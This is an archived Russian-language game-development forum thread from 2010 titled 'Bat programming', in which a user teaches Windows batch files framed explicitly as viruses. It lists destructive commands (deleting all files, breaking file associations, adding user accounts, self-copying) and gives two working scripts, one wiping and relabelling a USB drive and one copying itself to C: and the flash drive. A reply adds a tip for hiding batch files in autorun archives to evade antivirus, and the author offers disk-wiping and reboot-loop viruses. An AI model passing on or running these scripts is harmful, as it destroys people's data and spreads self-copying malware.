Создать игру, создание игр, конструктора игр, игровые движки, разработка игр, сделать игру
Приветствую Вас Гость · Вход · Регистрация  ·  Новые сообщения · Участники · Правила · Поиск · RSS
Страница 1 из 11
Архив - только для чтения
Модератор форума: Конструктор 
Форум разработчиков игр » Архив » Архив тем сайта, закрытых и не актуальных » Bat программирование
Bat программирование
r_bit Дата: Среда, 15.12.2010, 09:22 | Сообщение # 1

Итак тут я раскажу как сделать простую программку на ЯП Bat где скачать не скажу тк она идет в Win32 и не требует компилятора.
Нам нужен блокнот, ОС Windows и прямые руки )
Запустим блокнот и введем
Code
Taskmgr

Жмем сохранить > там где расширение *.txt меняем на "все файлы"
и вводим имя "Диспетчер задач.bat" сохраняем, запускаем и у нас на мониторе красуется диспетчер задач.
Вот небольшой список команд:
Code

1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat);
2) «label x:y» - переименовывает диск x на имя y (пример label C:error);
3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);
4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);
5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka);
6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);
7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок)  (пример del F:\Data*.* /q);
8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3);
9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);
Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.
1)Программа для удаления файлов с флешки (если та вставлена) и переименования ее.

del F:\ *.* /q
label F:HACK

2)Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.

time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy %0 F:\Time.bat

Восновном этот ЯП используется хакерами для написания вирусов, брутов и фэйков

Если помог, можно и плюсик поставить +

Сообщение отредактировал: r_bit - Среда, 15.12.2010, 09:23
KpoJIuk Дата: Среда, 15.12.2010, 10:10 | Сообщение # 2

r_bit, да.. бат-вирусы - дело веселое) еще пакуешь в архив и ставишь в архиве автозапуск батника при установке, так ни один антивирус не поймает smile

Make games, not war!
r_bit Дата: Среда, 15.12.2010, 12:26 | Сообщение # 3

а бат вирусы какраз ни один антивирусняк не ловит могу скинуть код классного вируса форматирующего жёсткий диск C
KpoJIuk Дата: Среда, 15.12.2010, 14:39 | Сообщение # 4

r_bit, эн-нет. не отформатирует он его. я тебе гарантирую. винда напишет, что ты ололо и пытаешься форматнуть диск, который сейчас используешь.

Make games, not war!
r_bit Дата: Среда, 15.12.2010, 16:56 | Сообщение # 5

укропчик этот код именно все вместе с виндой удаляет
уменя еще на вмваре виндов хп получилось сделать вирус который без конца комп перезагружает =) моу кодом поделится )
Hagrael Дата: Среда, 15.12.2010, 17:15 | Сообщение # 6
Просмотр профиля: Hagrael

George & Daniel:
Война сухофруктов
r_bit Дата: Среда, 15.12.2010, 18:50 | Сообщение # 7

да на VMWare 7 (ОС windows xp) отключит не удалось пришлось ОС удалить =)
Скорп Дата: Среда, 15.12.2010, 22:34 | Сообщение # 8
( Космический мутант )
Просмотр профиля: Скорп

Что-то при запуске файл открывается на мгновение и сразу вылетает. Как это исправить, кто-нибудь знает?

Рандомный текст.
r_bit Дата: Среда, 15.12.2010, 23:41 | Сообщение # 9

Scorpio, с вирусами не шутят biggrin
Что-то при запуске файл открывается на мгновение и сразу вылетает. Как это исправить, кто-нибудь знает?

Это ошибка в коде что то ты ввел не верно напиши сюда код и я помогу исправить )
ДядяВолк Дата: Четверг, 16.12.2010, 01:34 | Сообщение # 10

r_bit, попробовал изменить дату, получилось. biggrin
r_bit Дата: Четверг, 16.12.2010, 12:18 | Сообщение # 11

да кстати все тэги будут в
Пуск>Все программы>Стандартные>Командная строка> Там надо ввести Help (и в низ все тэги пойдут)

Добавлено (16.12.2010, 12:18)
---------------------------------------------
Скачать программу для конвертирования bat в exe

Сообщение отредактировал: r_bit - Четверг, 16.12.2010, 12:40
Filinshein Дата: Четверг, 16.12.2010, 14:37 | Сообщение # 12
Просмотр профиля: Filinshein

Да, командную строку нужно запускать от имени Администратора, иначе он фиги казать будет smile

Слова, дела, базар, дележ.... Мы далеки от простоты. Взгляни, на что наш Мир похож! Куда ни глянь, одни понты...
Скорп Дата: Четверг, 16.12.2010, 16:06 | Сообщение # 13
( Космический мутант )
Просмотр профиля: Скорп

Quote (r_bit)
Это ошибка в коде что то ты ввел не верно напиши сюда код и я помогу исправить )

у меня тоже самое и с help'ом по командам...

Рандомный текст.
r_bit Дата: Четверг, 16.12.2010, 16:20 | Сообщение # 14

даэто не в бат файле надо указывать а в командной строке
Форум разработчиков игр » Архив » Архив тем сайта, закрытых и не актуальных » Bat программирование
Страница 1 из 11
Поиск:

При полном или частичном копировании материалов сайта ссылка на Make-Games.ru обязательна. Make-Games.ru © 2008 - 2016 Хостинг от uWeb
Топ Разработка игр Рейтинг@Mail.ru